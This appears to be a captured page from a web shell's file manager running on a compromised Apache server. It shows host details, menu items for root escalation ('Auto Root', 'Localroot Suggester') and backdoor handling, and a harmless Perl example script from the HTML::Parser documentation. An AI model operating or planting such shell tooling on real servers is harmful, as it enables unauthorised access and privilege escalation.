Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libhtml-parser-perl /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
README
1.06
KB
-rw-r--r--
2016-01-22 00:10
hanchors
1.14
KB
-rwxr-xr-x
2016-01-22 00:10
hdump
683
B
-rwxr-xr-x
2016-01-22 00:10
hform
1.87
KB
-rwxr-xr-x
2016-01-22 00:10
hlc
710
B
-rwxr-xr-x
2016-01-22 00:10
hrefsub
2.72
KB
-rwxr-xr-x
2013-10-21 07:44
hstrip
1.74
KB
-rwxr-xr-x
2016-01-22 00:10
htext
575
B
-rwxr-xr-x
2016-01-22 00:10
htextsub
955
B
-rwxr-xr-x
2016-01-22 00:10
htitle
434
B
-rwxr-xr-x
2013-10-21 07:44
Save
Rename
#!/usr/bin/perl -w # This script will assume that the first command line argument # is a file containing HTML, and return a version # where all the tags are converted to lowercase. use strict; use HTML::Parser (); HTML::Parser->new(start_h => [ \&start_lc, "tokenpos, text" ], end_h => [ sub { print lc shift }, "text" ], default_h => [ sub { print shift }, "text" ], ) ->parse_file(shift) || die "Can't open file: $!\n"; sub start_lc { my($tpos, $text) = @_; for (my $i = 0; $i < @$tpos; $i += 2) { next if $i && ($i/2) % 2 == 0; # skip attribute values $_ = lc $_ for substr($text, $tpos->[$i], $tpos->[$i+1]); } print $text; }